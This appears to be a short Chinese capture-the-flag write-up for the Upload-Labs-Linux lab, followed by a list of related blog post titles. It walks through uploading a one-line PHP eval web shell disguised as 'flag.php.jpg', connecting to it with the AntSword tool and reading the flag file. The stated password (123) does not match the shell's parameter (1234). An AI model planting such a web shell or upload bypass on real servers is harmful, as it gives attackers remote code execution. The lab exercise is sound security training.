Upload-Labs-Linux

题目

1.打开靶机

随便上传一个图片,查看get请求发现**/upload/XXX.jpg**

2.创建一个脚本文件

命名为flag.php.jpg,并上传

脚本文件内容:

<?php @eval($_POST[1234])?>

3上传后复制文件get请求的链接并打开蚁剑

连接密码为123

双击链接

4,查找'/'在最下面找到flag文件

5,打开文件得到flag

相关推荐
.Ayang2 小时前
SSRF漏洞利用
网络·安全·web安全·网络安全·系统安全·网络攻击模型·安全架构
.Ayang2 小时前
SSRF 漏洞全解析(概述、攻击流程、危害、挖掘与相关函数)
安全·web安全·网络安全·系统安全·网络攻击模型·安全威胁分析·安全架构
风间琉璃""4 小时前
二进制与网络安全的关系
安全·机器学习·网络安全·逆向·二进制
Che_Che_5 小时前
Cross-Inlining Binary Function Similarity Detection
人工智能·网络安全·gnn·二进制相似度检测
恃宠而骄的佩奇6 小时前
i春秋-签到题
web安全·网络安全·蓝桥杯
follycat6 小时前
信息收集--CDN绕过
网络·安全·网络安全
清风.春不晚9 小时前
shell脚本2---清风
网络·网络安全
Wh1teR0se20 小时前
[极客大挑战 2019]Secret File--详细解析
前端·web安全·网络安全
网安_秋刀鱼1 天前
PHP代码审计 --MVC模型开发框架&rce示例
开发语言·web安全·网络安全·php·mvc·1024程序员节